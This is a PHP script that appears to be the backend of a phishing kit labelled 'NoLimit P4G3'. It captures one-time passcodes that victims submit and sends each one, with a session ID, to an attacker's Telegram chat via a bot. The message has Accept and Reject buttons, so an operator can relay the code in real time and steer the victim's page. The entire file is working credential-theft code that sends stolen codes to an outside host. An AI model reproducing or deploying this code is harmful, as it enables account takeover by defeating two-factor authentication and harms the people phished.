<?php
require_once 'admin.php';

session_start();

if (!isset($_SESSION['unique_id'])) {
    $_SESSION['unique_id'] = bin2hex(random_bytes(16));
}

$uniqueId = $_SESSION['unique_id'];

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    $input = json_decode(file_get_contents('php://input'), true);
    $otpCode = htmlspecialchars($input['otp_code']);

    if (!$otpCode) {
        http_response_code(400);
        echo json_encode(['status' => 'error', 'message' => 'No OTP provided.']);
        exit;
    }

    $otpFile = __DIR__ . '/otp/otp_status.json';

    $otpStatuses = file_exists($otpFile) ? json_decode(file_get_contents($otpFile), true) : [];
    $otpKey = $uniqueId . '|' . $otpCode;

    if (isset($otpStatuses[$otpKey])) {
        $status = $otpStatuses[$otpKey]['status'];
        if ($status === 'accepted') {
            echo json_encode(['status' => 'accepted']);
            exit;
        } elseif ($status === 'rejected') {
            echo json_encode(['status' => 'rejected']);
            exit;
        }
        echo json_encode(['status' => $status]);
        exit;
    }

    $message = "NoLimit P4G3 OTP Validation\n\n";
    $message .= "ID: #$uniqueId\n";  
    $message .= "| + OTP: $otpCode\n\n";

    $inlineKeyboard = [
        'inline_keyboard' => [
            [
                ['text' => 'Accept', 'url' => DOMAIN . "/update-otp.php?action=ACCEPTED&otp_code=$otpCode&uid=$uniqueId"],
                ['text' => 'Reject', 'url' => DOMAIN . "/update-otp.php?action=REJECTED&otp_code=$otpCode&uid=$uniqueId"]
            ]
        ]
    ];

    $telegramUrl = "https://api.telegram.org/bot" . BOT_TOKEN . "/sendMessage";
    $data = [
        'chat_id' => CHAT_ID,
        'text' => $message,
        'parse_mode' => 'Markdown',
        'reply_markup' => json_encode($inlineKeyboard)
    ];

    $options = [
        'http' => [
            'header' => "Content-type: application/x-www-form-urlencoded\r\n",
            'method' => 'POST',
            'content' => http_build_query($data),
        ],
    ];

    $context = stream_context_create($options);
    $result = file_get_contents($telegramUrl, false, $context);

    if ($result === FALSE) {
        error_log("Failed to send OTP approval request to Telegram.");
        echo json_encode(['status' => 'error', 'message' => 'Failed to send OTP for approval.']);
    } else {
        $otpStatuses[$otpKey] = ['status' => 'pending', 'timestamp' => time()];
        file_put_contents($otpFile, json_encode($otpStatuses));
        echo json_encode(['status' => 'pending', 'message' => 'OTP sent for approval.']);
    }
} elseif (isset($_GET['check_status'])) {
    $otpCode = htmlspecialchars($_GET['check_status']);
    $otpFile = __DIR__ . '/otp/otp_status.json';
    $uniqueId = isset($_SESSION['unique_id']) ? $_SESSION['unique_id'] : '';
    $otpKey = $uniqueId . '|' . $otpCode;

    if (!file_exists($otpFile) || !is_readable($otpFile)) {
        http_response_code(500);
        echo json_encode(['status' => 'error', 'message' => 'OTP status file not found or unreadable.']);
        exit;
    }

    $otpStatuses = json_decode(file_get_contents($otpFile), true);

    if (isset($otpStatuses[$otpKey])) {
        $status = $otpStatuses[$otpKey]['status'];
        echo json_encode(['status' => $status]);
    } else {
        echo json_encode(['status' => 'pending']);
    }
} else {
    echo json_encode(['status' => 'error', 'message' => 'Invalid request.']);
}
?> 